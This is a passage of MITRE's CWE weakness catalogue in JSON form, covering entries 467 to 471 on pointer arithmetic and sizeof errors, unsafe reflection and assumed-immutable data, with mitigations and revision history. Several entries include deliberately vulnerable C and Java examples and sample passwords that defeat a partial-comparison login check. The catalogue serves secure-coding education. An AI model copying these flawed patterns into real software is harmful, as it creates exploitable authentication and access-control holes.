Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Illegal Pointer Value","attr":{"@_Date":"2008-04-11"}}}},"467":{"attr":{"@_ID":"467","@_Name":"Use of sizeof() on a Pointer Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code calls sizeof() on a malloced pointer type, which always returns the wordsize/8. This can produce an unexpected result if the programmer intended to determine how much memory has been allocated.","Extended_Description":"The use of sizeof() on a pointer can sometimes generate useful information. An obvious case is to find out the wordsize on a platform. More often than not, the appearance of sizeof(pointer) indicates a bug.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"131","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"This error can often cause one to allocate a buffer that is much smaller than what is needed, leading to resultant weaknesses such as buffer overflows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use expressions such as \\"sizeof(*pointer)\\" instead of \\"sizeof(pointer)\\", unless you intend to run sizeof() on a pointer type to gain some platform independence or if you are allocating a variable on the stack."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Care should be taken to ensure sizeof returns the size of the data structure itself, and not the size of the pointer to the data structure.","Body_Text":["In this example, sizeof(foo) returns the size of the pointer.","In this example, sizeof(*foo) returns the size of the data structure and not the size of the pointer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(foo));","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(*foo));","xhtml:br":["",""]}}]},{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Sizeof username = %d\\\\n\\", sizeof(username));printf(\\"Sizeof pass = %d\\\\n\\", sizeof(pass));if (strncmp(username, inUser, sizeof(username))) {}if (! strncmp(pass, inPass, sizeof(pass))) {}else {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Auth failure of username using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth success of password using sizeof\\\\n\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth fail of password using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:i":"/* Because of CWE-467, the sizeof returns 4 on many platforms and architectures. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult != AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"pass5passABCDEFGHpassWORD","xhtml:br":["",""]}}],"Body_Text":["In AuthenticateUser(), because sizeof() is applied to a parameter with an array type, the sizeof() call might return 4 on many modern architectures. As a result, the strncmp() call only checks the first four characters of the input password, resulting in a partial comparison (CWE-187), leading to improper authentication (CWE-287).","Because of the partial comparison, any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","Because only 4 characters are checked, this significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"adminXYZ\\" and \\"administrator\\" will succeed for the username."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of sizeof() on a pointer type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR01-C","Entry_Name":"Do not apply the sizeof operator to a pointer when taking the size of an array"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-442"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"468":{"attr":{"@_ID":"468","@_Name":"Incorrect Pointer Scaling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Programmers may try to index from a pointer by adding a number of bytes. This is incorrect because C and C++ implicitly scale the operand by the size of the data type."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"Incorrect pointer scaling will often result in buffer overflow conditions. Confidentiality can be compromised if the weakness is in the context of a buffer over-read or under-read."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a platform with high-level memory abstractions."},{"Phase":"Implementation","Description":"Always use array indexing instead of direct pointer manipulation."},{"Phase":"Architecture and Design","Description":"Use technologies for preventing buffer overflows."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unintentional pointer scaling"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR39-C","Entry_Name":"Do not add or subtract a scaled integer to a pointer","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP08-C","Entry_Name":"Ensure pointer arithmetic is used correctly"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Pointer Arithmetic&#34;, Page 277"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Unintentional Pointer Scaling","attr":{"@_Date":"2008-04-11"}}}},"469":{"attr":{"@_ID":"469","@_Name":"Use of Pointer Subtraction to Determine Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Save an index variable. This is the recommended solution. Rather than subtract pointers from one another, use an index variable of the same size as the pointers in question. Use this variable to \\"walk\\" from one pointer to the other and calculate the difference. Always validate this number."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed a pointer to the head of the linked list.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct node {};int size(struct node* head) {}...","xhtml:div":[{"#text":"int data;struct node* next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"struct node* current = head;struct node* tail;while (current != NULL) {}return tail - head;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"tail = current;current = current-&gt;next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","","","","","","",""],"xhtml:i":["// Returns the number of nodes in a linked list from","// the given pointer to the head of the list.","// other methods for manipulating the list"]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...int size(struct node* head) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"struct node* current = head;int count = 0;while (current != NULL) {}return count;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"count++;current = current-&gt;next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"However, the method creates a pointer that points to the end of the list and uses pointer subtraction to determine the number of nodes in the list by subtracting the tail pointer from the head pointer. There no guarantee that the pointers exist in the same memory area, therefore using pointer subtraction in this way could return incorrect results and allow other unintended behavior. In this example a counter should be used to determine the number of nodes in the list, as shown in the following code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper pointer subtraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR36-C","Entry_Name":"Do not subtract or compare two pointers that do not refer to the same array","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Pointer Subtraction","attr":{"@_Date":"2008-04-11"}}}},"470":{"attr":{"@_ID":"470","@_Name":"Use of Externally-Controlled Input to Select Classes or Code (\'Unsafe Reflection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.","Extended_Description":"If the application uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the application to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the application\'s classpath (CWE-427) or add new entries to the application\'s classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Reflection Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"],"Note":"The attacker might be able to execute code that is not directly accessible to the attacker. Alternately, the attacker could call unexpected code in the wrong place or the wrong time, possibly modifying critical system state."},{"Scope":["Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"The attacker might be able to use reflection to call the wrong code, possibly with unexpected arguments that violate the API (CWE-227). This could cause the application to exit or hang."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"By causing the wrong code to be invoked, the attacker might be able to trigger a runtime error that leaks sensitive information in the error message, such as CWE-536."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your code to avoid using reflection."},{"Phase":"Architecture and Design","Description":"Do not use user-controlled inputs to select and load classes or code."},{"Phase":"Implementation","Description":"Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection:","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Worker ao = null;if (ctl.equals(\\"Add\\")) {}else if (ctl.equals(\\"Modify\\")) {}else {}ao.doAction(request);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ao = new AddCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ao = new ModifyCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw new UnknownActionError();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.checkAccessControl(request);ao.doAction(request);","xhtml:br":["","","",""]}}],"Body_Text":["A programmer might refactor this code to use reflection as follows:","The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher\'s access control code. If they do not modify the access control code, then some Worker classes will not have any access control.","One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows:","Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker\'s favor, the damage will already have been done. Although this scenario is relatively benign in simple applications, in larger applications where complexity grows exponentially it is not unreasonable that an attacker could find a constructor to leverage as part of an attack."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2331","Description":"Database system allows attackers to bypass sandbox restrictions by using the Reflection APi.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2331"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe Reflection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not use reflection to increase accessibility of classes, methods, or fields"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe Reflection","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Externally-Controlled Input to Select Classes or Code (aka \'Unsafe Reflection\')","attr":{"@_Date":"2009-05-27"}}]}},"471":{"attr":{"@_ID":"471","@_Name":"Modification of Assumed-Immutable Data (MAID)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly protect an assumed-immutable element from being modified by an attacker.","Extended_Description":"This occurs when a particular input is critical enough to the functioning of the application that it should not be modifiable at all, but it is. Certain resources are often assumed to be immutable when they are not, such as hidden form fields in web applications, cookies, and reverse DNS lookups.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Common data types 